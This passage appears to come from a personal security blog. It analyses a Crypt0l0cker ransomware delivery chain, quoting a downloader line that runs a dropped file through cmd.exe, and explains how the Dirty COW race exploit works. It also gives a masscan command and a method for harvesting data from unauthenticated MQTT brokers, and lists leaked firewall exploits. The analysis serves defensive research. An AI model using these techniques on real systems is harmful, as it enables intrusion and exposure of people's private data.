Sunday, February 12, 2017

Crypt0l0cker Revival !

A couple of days ago a colleague of mine gave me a "brand new" piece of malicious content delivered through a single HTML page. The page was sent to a mailbox as part of a bigger attack. I found that vector particularly fun, so I'd like to share some of the steps that took me through a personal investigation, carried out not for professional use but just for fun.

At first sight the HTML page looks like the following image.

Figure1: Attack Vector. A simple HTML page

A white HTML page with a single line of text on it saying: "print this document please". But what document? Honestly, I am in front of one of the ugliest "fake emails" I have ever seen. But let's move on and see what it really carries. Opening the HTML content with a simple editor, we see suspicious obfuscated JavaScript. We are facing a first obfuscation stage.

Figure2: Obfuscated First Stage

Since JavaScript is an interpreted language delivered as source code, it is not hard to understand its behavior. Indeed, after some rounds of "substitutions" and "concatenations" it is easy to get the following clear-text result, which shows the end of the first stage.

Figure3: Clear Text First Stage
That script is going to create an additional "script tag" on the current document by injecting an external script from: "". The injected script will be called with the following code signature: "saveAs(blob, 'image.js');" with 2 arguments: 
  1. blob. The raw content of "big_encoded_data" (please refer to Figure3)
  2. image.js. The saving name
In order to better understand what that function saveAs(blob, image.js) does we need to analyze the external FileServer.js. The entry point of the external script is the function "saveAs(arg1, arg2)" which has been defined as follows:

Figure4: FileServer.js Original Entry

saveAs(blob, name) is a simple wrapper around the FileServer constructor, which is defined as follows:

Figure5: FileServer.js constructor

The script saves the "blob" content to the temporary folder, giving it a specific name (image.js in our case). As you might notice from the script content ("Apple do not allow, see "), if the victim opens the file with Safari/Mail the attack vector will have no effect, since Safari/Mail does not allow the script to be triggered on the "" event. This is why I didn't see any file when I opened the infected HTML content. Back to the original script (Figure3), we see the saveAs function called on page.load, so the resulting image.js is going to be saved in the temporary local folder; in the case of email clients, it will be triggered as soon as it is saved!

So let's move on to our next stage: the big_encoded_data variable (Figure3), which is going to be saved as the image.js file. The big_encoded_data carries a first obfuscation layer, made by encoding the downloader in base64. Once decoded from base64 and beautified, the result looks like the following image.

Figure6: Stage 2 base64 decoded obfuscated downloader
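Peeling this first layer needs nothing more than a base64 decoder. Here is a minimal Python sketch, assuming the blob has been copied out of the HTML page into a string. The function name and the sample value are my own placeholders, not the real big_encoded_data; the point is to read the payload offline, never to run it.

```python
import base64

def decode_stage(encoded: str) -> str:
    """Decode a base64 blob into text for offline inspection (never execute it)."""
    raw = base64.b64decode(encoded)
    # Replace undecodable bytes so a partly binary payload can still be read.
    return raw.decode("utf-8", errors="replace")

# Harmless placeholder standing in for the real big_encoded_data value.
sample = base64.b64encode(b"var a = ['run', 'cmd.exe'];").decode("ascii")
print(decode_stage(sample))
```

The decoded text can then go through any JavaScript beautifier before the manual deobfuscation starts.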

The downloader is still obfuscated by a large number of simple variables that return strings from arrays. It took me almost 45 minutes to decode the entire second-stage downloader. The result is shown in the following image.

Figure7: Second Stage Downloader
A first check on the fileSystem API and on the Element Type is super interesting (at least to me): we are analyzing an attack based on a specific, Windows-native file system. The deobfuscated downloader grabs a file from "" and saves it to a temporary directory. By using ActiveXObject (Windows native) it saves the file and runs it through the command line with c["run"]("cmd.exe /c " + f + g, "0");, where f takes the temporary folder, f = b["GetSpecialFolder"]("2");, and g takes the temporary name, g = b["GetTempName"]();.

This is the end of the second stage downloader.

The downloaded file is a PE executable, and it is packed as well. Fortunately the packer is the PiMP Stub by Nullsoft: a quite famous installer used by several software houses.

Figure8: NullSoft Installer

The PiMP installer takes DLLs and runs them as the resulting software. The resources it uses are compressed inside its own body with a well-known algorithm: 7zip. Kation.DLL is the only DLL included in the dropped file, so it is the DLL run by the PiMP installer. Kation wraps ADVAPI32.DLL and KERNEL32.DLL, as you might see from Figure9. ADVAPI32 is a core Microsoft library which includes Microsoft encryption functions such as EncryptFileA and EncryptFileW. It's not hard to guess a new ransomware infection from those API calls.

Figure9: Usage of Encryption Libraries

From a static analysis perspective it becomes clear that some of the strings used are dynamically allocated. For example, in sub_10001170 (frame 0XBC) several UTF-16 strings are involved in a decryption loop, which shows the control flow passing to Etymology.Vs (Figure11).

Figure10: Setting the running pointer

Figure11: Decoding Functions

The real behavior is hidden in the encrypted Etymology.Vs file, which is included in the PiMP package as well. Running the infected sample discloses its real behavior, shown in Figure12.

Figure12: Ransom Request

Here we go, we have just discovered a brand new Crypt0L0cker! It asks for bitcoin (Figure13), of course. Looking at the network communications, a Domain Name Generator Algorithm (DNGA) [wow, that sounds new for CryptoL0Cker!] fires up as soon as the dropped file is executed. It looks for valid registered subdomains belonging to  Until a valid Command and Control answers the CryptoLocker client, it hides itself and performs simple DNS queries as follows:


The process of contacting the Command and Control in order to exchange keys and notify the attacker can be very time consuming: in some of my runs it took up to 2 hours, depending on which Command and Control was available at the time. It would be very nice to have extra time to reverse the DNGA, but unfortunately my weekend is running out.

Figure13: Ransom Request Web Page

The development language is French, and many pieces of code remind me of the "gaming world". The main Command and Control domain is registered in Moscow (RU) and the registrant is "privacy protected".

Results for Target:
Created Date :2017-02-07T12:37:10Z
Updated Date :2017-02-08T10:38:54Z
Results for Target:
Created Date :2017-02-07T12:37:10Z
Updated Date :2017-02-08T10:38:54Z

The ransom page (available at the following link) is registered through EPAG Domainservices GmbH (Bonn, Germany) and is written in French:

OK, let's have some brand new IoCs:

Malicious hashes:

Malicious urls:

- base dns:

.?????? (6 characters)


Enjoy your new IoC

Thursday, December 15, 2016

Malware Training Sets: A machine learning dataset for everyone

One of the most challenging tasks in Machine Learning is defining a great training (and possibly dynamic) dataset. Assuming a well-known learning algorithm and a periodic supervised learning process, what you need is a classified dataset to best train your machine. Thousands of training datasets are available out there, from "flowers" to "dice" passing through "genetics", but I was not able to find a great classified dataset for malware analysis. So I decided to build one myself and to share it with the scientific community (and everybody interested in it), in order to give everyone a starting point for Machine Learning applied to Malware Analysis. The first challenge I faced was defining the features and how to extract them. Basically I had two choices:
  1. Extracting features directly from samples. This is the easiest solution since the possible extracted features would be directly related to the sample such as (but not limited to): file "sections", "entropy", "Syscalls" and decompiled assembly n-grams.
  2. Extracting features from sample analyses. This is the hardest solution since it would include both static analysis, such as (but not limited to) file sections, entropy and "Syscall/API", and dynamic analysis, such as (but not limited to) "Contacted IP", "DNS Queries", "execution processes", "AV signatures", etc. Plus, I needed a complex system of dynamic analysis including multiple sandboxes and static analysers.
I decided to follow the hardest path, extracting features from both the static analysis and the dynamic analysis of sample detonations, in order to collect as many features as I can and leave the data scientist free to decide which features to use and which to drop in the data mining process. The analyses were performed by detonating the samples in several sandboxes (free and commercial ones), which produced a first stage of ontologically homogeneous blocks called "Analyses Results" (AR). ARs are too verbose, and they do not perform well with any text algorithm I know of.

After more reading on the topic I came across the Malware Instruction Set for Behaviour Analysis (MIST), described by Philipp Trinius et al. (document available here). MIST is basically a representation optimised for effective and efficient analysis of behaviour using data mining and machine learning techniques. It can be obtained automatically during analysis of malware with a behaviour monitoring tool or by converting existing behaviour reports. The representation is not restricted to a particular monitoring tool and thus can also be used as a meta language to unify behaviour reports of different sources. The following image shows the MIST encoding structure.

A simple example coming directly from the aforementioned paper is shown in the following image, where "load.dll" has been detected. The 'load dll' system call is executed by every piece of software several times during process initialisation and at run-time, since under Windows dynamic-link libraries (DLLs) are used to implement the Windows subsystem and offer an interface to the operating system. The following shows how the load.dll has been encoded in the MIST meta language.

I decided to use the same concept of "meta language" but with self-descriptive logic (without encoding the category operation, since it would not affect the analyses) and with every piece of information organised into a well-formed JSON file rather than a line-based text file, so that it can be used in external environments with zero effort. The produced dataset looks like the following:

DataSet Snippet
Each JSON property could be used as a feature for your Machine Learning algorithm of choice, but the most significant ones are those placed under the section labelled "properties". Each of them, meaning each field placed under the "properties" section of the produced JSON file, is optional and is structured as follows:

category_action_with_description |  "sanitized" involved subjects with spaces

So for example:

"sig_copies_self": "e5ed769a e5ed769a 98e83379"

It means the category is sig (which stands for signature) and the action is "copies itself". e5ed769a e5ed769a 98e83379 are 3 sanitized pieces of evidence of where the sample copies itself (see the Sanitization Procedures).

 "sig_antimalware_metascan": ""

It means the category is sig (which stands for signature) and the action is "antimalware_metascan". The evidence is empty, meaning that metascan found no signature (in this case).

"sig_antivirus_virustotal": "ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b"

It means the antivirus_virustotal signature found 5 pieces of evidence (ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b).
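The three examples above can be read mechanically. The following Python sketch is only my illustration of the naming convention, not code from the dataset pipeline: the Feature type and the parse_property helper are hypothetical names, and I assume the category is whatever comes before the first underscore.

```python
from typing import NamedTuple

class Feature(NamedTuple):
    category: str   # e.g. "sig", "file", "reg"
    action: str     # e.g. "copies_self"
    evidence: list  # sanitized tokens, possibly empty

def parse_property(key: str, value: str) -> Feature:
    # Assumption: the category is the text before the first underscore.
    category, _, action = key.partition("_")
    # Evidence tokens are separated by spaces; an empty string yields no tokens.
    return Feature(category, action, value.split())

f = parse_property("sig_copies_self", "e5ed769a e5ed769a 98e83379")
print(f.category, f.action, len(f.evidence))
```

Keeping the evidence as a list makes it easy to count tokens or to treat each token as a separate feature later on.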

A fundamental property is the "label" property, which classifies the malware family. I decided to name this field "label" rather than "malware_name", "malware_family" or "classification" in order to stay compatible with the many machine learning implementations which rely on a field called "label" to work properly (it seems to be a de facto standard for many engines).

Sanitization Procedures

The aim of the project is to provide a useful, classified dataset to researchers who want to investigate malware analysis more deeply by using Machine Learning techniques. Speeding up text mining is essential, and for that reason I decided to use some well-known sanitization techniques to "hash" the evidence, leaving its meaning unchanged but drastically improving speed from an algorithmic point of view. The following picture shows the sanitization procedures:

Sanitization Procedures

From a developer's perspective the procedures cited (and shown) are not well written; for example, they are not protected and ".replace" may not be safe with specific inputs. For that reason I will not release the code. But please keep in mind that the result of my project is not the "sanitization code" but its outcome: the classified malware analysis dataset. So I focused my attention on feature extraction, sample collection, aggregation, conversion and, of course, analysis, not really on developing production code.

Training DataSets Generation: The Simplified Process

The whole process to obtain the training datasets is described in the following flowchart. The detonation of a classified malware sample in multiple sandboxes produces multiple static and dynamic analyses, which converge into an analyses results artefact (AR). The AR is then translated into a MIST-inspired meta language to be software agnostic and to give freedom to data scientists.

Data Samples

Today (please refer to the blog post date) the collected classified dataset is composed of the following samples:
  • APT1 292 Samples
  • Crypto 2024 Samples
  • Locker 434 Samples
  • Zeus 2014 Samples
If you own classified malware samples and you want to share them with me in order to contribute to the Machine Learning Training Datasets, you are welcome: just drop me an email!
I will definitely process the samples and build new datasets to share with everybody.

Where can I download the training datasets ?  HERE

Available Features and Frequency

The following list enumerates the features available for each sample. The features, as mentioned, are optional, meaning you might not have all the same features for every sample. If the sample you are analysing does not have a specific feature, you should consider it as None (or undefined), since that feature was not available for that sample. So if you are writing your own machine learning algorithm you should include a "purification procedure" which ignores None features during training and/or querying.
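Such a "purification procedure" can be very small. Below is a hedged Python sketch: I assume each sample is a dictionary with a "label" and a "properties" section, as described earlier, and the two samples are made up for illustration. The helper names purify and to_counts are mine, and counting evidence tokens is just one possible way to turn a property into a number.

```python
def purify(sample: dict) -> dict:
    """Return only the features that are actually present in one sample."""
    props = sample.get("properties") or {}
    return {name: value for name, value in props.items() if value is not None}

def to_counts(samples: list) -> list:
    """Turn each sample into (label, {feature: number of evidence tokens})."""
    rows = []
    for sample in samples:
        feats = purify(sample)
        counts = {name: len(str(value).split()) for name, value in feats.items()}
        rows.append((sample.get("label"), counts))
    return rows

# Made-up samples, only to exercise the functions.
samples = [
    {"label": "Zeus", "properties": {"sig_copies_self": "e5ed769a 98e83379", "net_dns": None}},
    {"label": "Locker", "properties": {"sig_antimalware_metascan": ""}},
]
print(to_counts(samples))
```

A feature that is present but empty (no evidence found) is kept with a count of 0, while a None feature disappears entirely, which keeps "not observed" distinct from "not available".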

List of currently available features with their occurrence counts:

   'file_access': 138759,
   'sig_infostealer_ftp': 13114,
   'sig_modifies_hostfile': 5,
   'sig_removes_zoneid_ads': 16,
   'sig_disables_uac': 33,
   'sig_static_versioninfo_anomaly': 0,
   'sig_stealth_webhistory': 417,
   'reg_write': 11942,
   'sig_network_cnc_http': 132,
   'api_resolv': 954690,
   'sig_stealth_network': 71,
   'sig_antivm_generic_bios': 6,
   'sig_polymorphic': 705,
   'sig_antivm_generic_disk': 7,
   'sig_antivm_vpc_keys': 0,
   'sig_antivm_xen_keys': 5,
   'sig_creates_largekey': 16,
   'sig_exec_crash': 6,
   'sig_antisandbox_sboxie_libs': 144,
   'sig_mimics_icon': 2,
   'sig_stealth_hidden_extension': 9,
   'sig_modify_proxy': 384,
   'sig_office_security': 20,
   'sig_bypass_firewall': 29,
   'sig_encrypted_ioc': 476,
   'sig_dropper': 671,
   'reg_delete': 2545,
   'sig_critical_process': 3,
   'service_start': 312,
   'net_dns': 486,
   'sig_ransomware_files': 5,
   'sig_virus': 781,
   'file_write': 20218,
   'sig_antisandbox_suspend': 2,
   'sig_sniffer_winpcap': 16,
   'sig_antisandbox_cuckoocrash': 11,
   'file_delete': 5405,
   'sig_antivm_vmware_devices': 1,
   'sig_ransomware_recyclebin': 0,
   'sig_infostealer_keylog': 44,
   'sig_clamav': 1350,
   'sig_packer_vmprotect': 1,
   'sig_antisandbox_productid': 18,
   'sig_persistence_service': 5,
   'sig_antivm_generic_diskreg': 162,
   'sig_recon_checkip': 4,
   'sig_ransomware_extensions': 4,
   'sig_network_bind': 190,
   'sig_antivirus_virustotal': 175975,
   'sig_recon_beacon': 23,
   'sig_deletes_shadow_copies': 24,
   'sig_browser_security': 216,
   'sig_modifies_desktop_wallpaper': 83,
   'sig_network_torgateway': 1,
   'sig_ransomware_file_modifications': 23,
   'sig_antivm_vbox_files': 7,
   'sig_static_pe_anomaly': 2194,
   'sig_copies_self': 591,
   'sig_antianalysis_detectfile': 51,
   'sig_antidbg_devices': 6,
   'file_drop': 6627,
   'sig_driver_load': 72,
   'sig_antimalware_metascan': 1045,
   'sig_modifies_certs': 46,
   'sig_antivm_vpc_files': 0,
   'sig_stealth_file': 1566,
   'sig_mimics_agent': 131,
   'sig_disables_windows_defender': 3,
   'sig_ransomware_message': 10,
   'sig_network_http': 216,
   'sig_injection_runpe': 474,
   'sig_antidbg_windows': 455,
   'sig_antisandbox_sleep': 271,
   'sig_stealth_hiddenreg': 13,
   'sig_disables_browser_warn': 20,
   'sig_antivm_vmware_files': 6,
   'sig_infostealer_mail': 617,
   'sig_ipc_namedpipe': 13,
   'sig_persistence_autorun': 2355,
   'sig_stealth_hide_notifications': 19,
   'service_create': 62,
   'sig_reads_self': 14460,
   'mutex_access': 15017,
   'sig_antiav_detectreg': 4,
   'sig_antivm_vbox_libs': 0,
   'sig_antisandbox_sunbelt_libs': 2,
   'sig_antiav_detectfile': 2,
   'reg_access': 774910,
   'sig_stealth_timeout': 1024,
   'sig_antivm_vbox_keys': 0,
   'sig_persistence_ads': 3,
   'sig_mimics_filetime': 3459,
   'sig_banker_zeus_url': 1,
   'sig_origin_langid': 71,
   'sig_antiemu_wine_reg': 1,
   'sig_process_needed': 137,
   'sig_antisandbox_restart': 24,
   'sig_recon_programs': 5318,
   'str': 1443775,
   'sig_antisandbox_unhook': 1364,
   'sig_antiav_servicestop': 78,
   'sig_injection_createremotethread': 311,
   'pe_imports': 301256,
   'sig_process_interest': 295,
   'sig_bootkit': 25,
   'reg_read': 458477,
   'sig_stealth_window': 1267,
   'sig_downloader_cabby': 50,
   'sig_multiple_useragents': 101,
   'pe_sec_character': 22180,
   'sig_disables_windowsupdate': 0,
   'sig_antivm_generic_system': 6,
   'cmd_exec': 2842,
   'net_con': 406,
   'sig_bcdedit_command': 14,
   'pe_sec_entropy': 22180,
   'pe_sec_name': 22180,
   'sig_creates_nullvalue': 1,
   'sig_packer_entropy': 3603,
   'sig_packer_upx': 1210,
   'sig_disables_system_restore': 6,
   'sig_ransomware_radamant': 0,
   'sig_infostealer_browser': 7,
   'sig_injection_rwx': 3613,
   'sig_deletes_self': 600,
   'file_read': 50632,
   'sig_fraudguard_threat_intel_api': 226,
   'sig_deepfreeze_mutex': 1,
   'sig_modify_uac_prompt': 1,
   'sig_api_spamming': 251,
   'sig_modify_security_center_warnings': 18,
   'sig_antivm_generic_disk_setupapi': 25,
   'sig_pony_behavior': 159,
   'sig_banker_zeus_mutex': 442,
   'net_http': 223,
   'sig_dridex_behavior': 0,
   'sig_internet_dropper': 3,
   'sig_cryptAM': 0,
   'sig_recon_fingerprint': 305,
   'sig_antivm_vmware_keys': 0,
   'sig_infostealer_bitcoin': 207,
   'sig_antiemu_wine_func': 0,
   'sig_rat_spynet': 3,
   'sig_origin_resource_langid': 2255

Cite The DataSet

If you find those results useful please cite them :

@misc{ MR,
   author = "Marco Ramilli",
   title = "Malware Training Sets: a machine learning dataset for everyone",
   year = "2016",
   url = "",
   note = "[Online; December 2016]"
}

Again, if you want to contribute your own classified samples, please send them to me and I will enrich the dataset.

Enjoy your new research!

Sunday, October 30, 2016

Dirty COW Notes

I do not usually write about vulnerabilities, because there are too many vulnerabilities out there and writing about just one of them is not going to contribute much to the security community. So why am I writing about Dirty COW? I am going to write about it because, in my personal opinion, it is huge. When I say "huge" I don't really mean it will be used to exploit the "entire world"; I mean it highlights two main issues:
  • Even patched code could easily hide the same vulnerability, just in a different way. How much patched code is not really "patched"?
  • A new pragmatic approach to identifying vulnerabilities: looking into patched code and checking the patch implementation.
But let's start from the beginning by taking a closer look at the exploit code.

Click to enlarge: Taken From Here

Like many other kernel vulnerabilities it relies on concurrency: the exploit code starts two separate threads which access the same resource at the same time. Taking a closer look at the main function, you will see that the mmap syscall is used.

calling mmap function
From documentation:
mmap() creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping.

mmap does not create a copy of the memory; rather, it creates a new mapping of the memory area behind that file descriptor. It means the process will read data directly from the original file rather than from a copy of it. While most of the parameters are obvious, the MAP_PRIVATE flag is the "core" of the vulnerability. It enables "copy on write" (hence the name COW), which basically copies the original data into a new memory area when that data is written. Since mmap has just mapped a read-only area and the process wants to write to it, mmap (MAP_PRIVATE) creates a copy of the data on write, so the modified data is not propagated to the original memory area.
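The intended copy-on-write behaviour (not the bug) is easy to observe from user space. This is a small Python sketch of my own, not part of the exploit: as far as I know, Python's mmap.ACCESS_COPY requests a private copy-on-write mapping (MAP_PRIVATE on Unix), so a write through the mapping must never reach the file. The function name and the temporary file are hypothetical.

```python
import mmap
import os
import tempfile

def private_write_leaves_file_untouched() -> tuple:
    """Write through a private (copy-on-write) mapping and report both views."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"original")
        os.close(fd)
        # The file is opened read-only, as in the exploit scenario.
        with open(path, "rb") as f:
            # ACCESS_COPY gives a private copy-on-write mapping of the file.
            with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_COPY) as m:
                m[0:8] = b"modified"      # lands in the private copy only
                in_memory = bytes(m[0:8])
        with open(path, "rb") as f:
            on_disk = f.read()
        return in_memory, on_disk
    finally:
        os.remove(path)

print(private_write_leaves_file_untouched())
```

On a correct kernel the process sees its own modified copy while the file on disk keeps the original bytes; Dirty COW is precisely a way to break that guarantee.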

Now the exploit runs two threads which exploit a race condition to get "write access" to the original memory area. The first thread repeatedly calls madvise (memory advise), which is used to improve process performance by tagging a memory area according to its expected usage: for example, the memory can be tagged as NORMAL, SEQUENTIAL, FREE, WILLNEED, and so on. In the exploit, the mmap memory is continuously tagged as DONTNEED, which basically means the memory is not going to be used in the near future, so the kernel can free it and reload the content only when needed.

First Thread implementing madvise

On the other hand, another thread writes to its own memory space (by abusing the pseudo file /proc/self/mem), directly on the mmap area pointing to the opened file. Since we invoked mmap with the MAP_PRIVATE flag, we are not going to write to that specific memory but to a copy of it (copy on write).

Second Thread implementing write on pseudo self/mem

The race condition between those two threads tricks the copy-on-write into writing to the original memory area, since the copied area can be tagged as DONTNEED while the write procedure is not finished yet. And voilà, you are writing to a read-only file!

OK, now we have figured out how the trick works, but what is most interesting is the story behind it.

On the issue tracker, Linus Torvalds (maximum respect) wrote:

This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug"). In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement software dirty bits") which made it into v3.9. Earlier kernels will have to look at the page state itself. Also, the VM has become more scalable, and what used a purely theoretical race back then has become easier to trigger.
S390 is ancient IBM technology... I am not even sure it still exists in the real world (at least if compared to recent systems). Probably the Linux community forgot about that removal; otherwise the fix would have been left in the recent memory managers.

Anyhow, the bug now "has been fixed" by introducing a new internal flag called FOLL_COW (really!? :) which basically says "yes, I already did the copy on write".
Basically the process can write to even unwritable pte's, but only after it has gone through a COW cycle and they are dirty. The diff of the patch follows:

Dirty Cow Patch3 on October 2016

The Dirty COW vulnerability put a new vulnerability hunting process in my mind. On one hand, there is the "industrial" way (corporate and/or governmental), where laboratories with extremely sophisticated, tuned and personalised fuzzers look for new vulnerabilities; on the other hand, there is the more romantic and crafty way of professionals and/or security researchers who rely on manual work and smart choices. But another smart approach (industrial or romantic) could be to investigate the patched code itself.

Patched code is by definition where a bug or issue was located. The most difficult part of finding vulnerabilities (not exploiting them) is figuring out where they are among thousands of lines of code. So finding vulnerabilities in patched code could be much quicker, even if it comes with a high "hypothetical" complexity since a patch is involved. But as this case testifies... that is not always the case!

Monday, October 17, 2016

Cybersecurity Awareness

My little contribution on cybersecurity to a national TV channel, next to Evgenij Valentinovič Kasperskij, founder of the Kaspersky Anti Virus Engine.

Tuesday, September 20, 2016

Internet of Broken Things: Threats are changing, so are we ?

Hi Folks, this is another blog post on the internet of "broken things". As many of you know, MQTT is one of the most used protocols in the Internet of Things. It's widely used in private networks, to make communications quick and light, and on public networks as well, to build communication channels between sensors and/or servers.

MQTT is a machine-to-machine (M2M)/"Internet of Things" connectivity protocol. It was designed as an extremely lightweight publish/subscribe messaging transport. It is useful for connections with remote locations where a small code footprint is required and/or network bandwidth is at a premium. For example, it has been used in sensors communicating to a broker via satellite link, over occasional dial-up connections with healthcare providers, and in a range of home automation and small device scenarios. It is also ideal for mobile applications because of its small size, low power usage, minimised data packets, and efficient distribution of information to one or many receivers.

Inspired by Lucas Lundgren's talk at DEF CON 24 titled "Light Weight Protocol! Serious Equipment! Critical Implications!", I decided to verify for myself the state of the art of MQTT implementations.

How MQTT works:

Understanding how the MQTT protocol works is crucial to figuring out why poor authentication implementations cause serious information disclosure issues. MQTT, invented by Andy Stanford-Clark of IBM and Arlen Nipper of Cirrus Link Solutions, stands for Message Queue Telemetry Transport and is now an OASIS standard. It was designed for sending telemetry data and often competes with REST HTTP APIs in modern IoT environments. While it is not a common protocol for communication between clouds (and servers), since AMQP (Advanced Message Queuing Protocol) is much more expressive and performant, it is often preferred for communication between small objects (things).

The protocol relies on a central node called the "Broker", which is organised into specific programmable topics. Publishers (things) publish information to specific topics (such as, but not limited to, temperature, localization, humidity, etc.), while subscribers (applications) get data from the explicit topics they are interested in. The following image represents a general architectural view. It's clear that a poorly implemented authentication mechanism leaves subscribers free to get all the published data.

MQTT Architecture Flow
The beauty of unauthenticated MQTT sessions lies in the subscriber's topic list. Indeed, a subscriber can subscribe to every topic on the selected broker by simply using # as the topic, even if it does not know the list of topics.
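To make the power of # concrete, here is a hedged Python sketch of how a topic filter is matched against a topic name. It follows my reading of the MQTT wildcard rules (# matches any number of levels, + matches exactly one, and leading wildcards do not match topics starting with $); it is an illustration, not any broker's actual code. The topic_matches name and the sample topics are mine.

```python
def topic_matches(topic_filter: str, topic: str) -> bool:
    """Check whether an MQTT topic filter matches a concrete topic name."""
    f_levels = topic_filter.split("/")
    t_levels = topic.split("/")
    # Wildcards at the first level do not match topics starting with "$".
    if topic.startswith("$") and f_levels[0] in ("#", "+"):
        return False
    for i, level in enumerate(f_levels):
        if level == "#":
            # Multi-level wildcard: matches this level and everything below it.
            return True
        if i >= len(t_levels):
            return False
        if level != "+" and level != t_levels[i]:
            return False
    # Without a trailing "#", both sides must have the same number of levels.
    return len(f_levels) == len(t_levels)

print(topic_matches("#", "home/master_bedroom/temperature"))
print(topic_matches("home/+/temperature", "home/garage/temperature"))
```

A single subscription to # is therefore enough to receive every application message published on an open broker, with no prior knowledge of its topic tree.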

Simple Experiment:

Let's assume we can find some unauthenticated MQTT brokers: what kind of messages could be identified? Hopefully not sensitive data. Let's see!

Step 1: Discovery.
masscan, even if not assiduously updated, is still one of my favourite tools to map the Internet. I performed a simple massive scan in order to find servers with port 1883 open (it's the default MQTT broker port). I know... an open port 1883 does not mean the server runs an MQTT broker on it. I totally agree, but my point is not a quantitative analysis but a qualitative one: I do not care how many real MQTT brokers are out there, but whether I can find sensitive data on one of them.

sudo bin/masscan --exclude -p1883 --max-rate 10000 -oX mas1883.xml 

After a few hours, thousands of IPs populate my "mas1883.xml" file.
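Before moving on, the addresses have to be pulled out of that XML file. The following Python sketch is an assumption on my side: it expects the nmap-style layout that masscan writes with -oX (host elements containing an address and a list of ports), and the open_hosts helper and the sample document with documentation-only IPs are hypothetical.

```python
import xml.etree.ElementTree as ET

def open_hosts(xml_text: str, port: str = "1883") -> list:
    """Collect addresses that report the given port as open."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        address = host.find("address")
        if address is None:
            continue
        for p in host.iter("port"):
            state = p.find("state")
            if p.get("portid") == port and state is not None and state.get("state") == "open":
                found.append(address.get("addr"))
    return found

# Hypothetical sample in the assumed layout, using documentation-only addresses.
SAMPLE = """<nmaprun scanner="masscan">
<host endtime="1474300000"><address addr="192.0.2.10" addrtype="ipv4"/><ports><port protocol="tcp" portid="1883"><state state="open" reason="syn-ack"/></port></ports></host>
<host endtime="1474300001"><address addr="192.0.2.11" addrtype="ipv4"/><ports><port protocol="tcp" portid="8883"><state state="open" reason="syn-ack"/></port></ports></host>
</nmaprun>"""
print(open_hosts(SAMPLE))
```

For a real run the text would come from reading mas1883.xml; for very large scans a streaming parser would be a better fit than loading everything at once.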

Step 2: Identification.
Assuming we get thousands of valid IPs running MQTT brokers, we need to try to connect to all of them and subscribe to every topic. Let's write a quick'n dirty 20 lines of code to make it happen.

Quick'n dirty script automating subscriptions
Step 3: Results Analysis
After a few hours of running, I got back interesting results (they were piped into different files by the launching bash script, which is so simple I did not even mention it). In order to describe the results I'd like to classify them into two simple sections: Not sensitive data and Sensitive data.

Not sensitive data. MQTT messages that do not refer directly to sensitive information but are still interesting to attackers, such as temperature, presence, light sensor and commercial data. If this information gets into the hands of a malicious physical attacker, he can figure out if and when to physically attack the building, since it is easy to detect human presence. The following image shows records belonging to Presence Sensors (PIR), Power Sensors, Humidity Sensors, Temperature Sensors and Noise Sensors.

Anonymised Not Sensitive Data
For example, an attacker could use this data to understand whether there are people in a room of the anonymised building (thanks to the value of the PIR sensor), whether someone is close to the room (thanks to noise sensors) or whether somebody has been in the room (thanks to temperature deltas). This information is useful to plan an attack. So even if this information is not sensitive per se, it is still important to protect it.

Another great example comes from an unauthenticated server hosting Samsung Smartthings devices.

Samsung Smartthings devices data
As you might see (enlarging the previous image.. :) we can totally monitor the "building". We know where the sensors have been placed (network_cabinet, master_bedroom, parkers_closet, garage_door, home_assistant) and what values they report. It is not hard to find an empty room, or an empty room_door_path to a target in the building.

Sensitive data. MQTT data that directly refers to private information such as (but not limited to) text messages and phone geolocation. The following image shows text messages between two users. The language used is Italian, and a close translation could be:
- "Talk to you soon"
- "Bye"

Anonymised Private Messages

The following image shows private information exchanged between pharmaceutical services (please do not ask me more about it... I won't give out more details; the pharmaceutical service has been alerted).

Anonymised Private Message between pharmaceutical services

The following image shows an interesting "spying" service (actually it's which communicates geo-location over MQTT unauthenticated brokers.

Geo-location tracks

Naturally, such private information should not be freely accessible. For example, knowing where people are without their permission is illegal in many states, and reading their application messages without judicial consent is illegal in many states as well. Naturally, correlating such information is illegal as well. Unfortunately attackers are everywhere, and thanks to the Internet and telecommunications their malicious activities can have a global impact. Nowadays everybody has a smart device, everybody keeps track of their own steps, everybody monitors their own heart and everybody puts everything on a cloud that does not belong to them. On the other hand, applications are not always well protected, making data freely available and exposing data owners to incredible indirect risks.

Final Thoughts:
Unfortunately it is not possible to stop this process: tomorrow there will be more smart things than today. Unfortunately it is not possible to protect everything either: products have to get to market as quickly as possible to gain market share. This process is quicker than the security community's ability to safely test everything. De facto, we will continue to use even more "smart things", which will monitor everything about our lives.

Threats are changing, so are we?

Tuesday, August 23, 2016

Summing up the ShadowBrokers Leak

Nowadays it's almost impossible not to write about the EquationGroup leak, so I'm going to start my "blog post" with the following picture (made by Kaspersky Lab), which should remove any doubt about the leak's paternity.

EquationGroup VS ShadowBrokers's Leak

The leaked dump contains a set of exploits, implants and tools for hacking firewalls (code name: "Firewall Operations"). Let's have a quick look at them:


The following is a list of the exploits found in the published leak. Please refer to the sources at the bottom of the page for the original write-ups about them.

EGREGIOUSBLUNDER. It is a remote code execution exploit for Fortigate firewalls. It leverages an HTTP cookie overflow and is different from CVE-2006-6493 as noted by Avast. Models affected include 60, 60M, 80C, 200A, 300A, 400A, 500A, 620B, 800, 5000, 1000A, 3600, and 3600A.

ELIGIBLEBACHELOR This is an exploit with an unclear attack vector for TOPSEC firewalls running TOS operating system versions,, and attack vector is unknown but it has an XML-like payload that starts with .

ELIGIBLEBOMBSHELL It is a remote code execution exploit for TOPSEC firewalls. It exploits an HTTP cookie command injection vulnerability and uses ETag examination for version detection. Versions affected include to 

WOBBLYLLAMA A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version

FLOCKFORWARD A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version

HIDDENTEMPLE A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.2.8840.1.

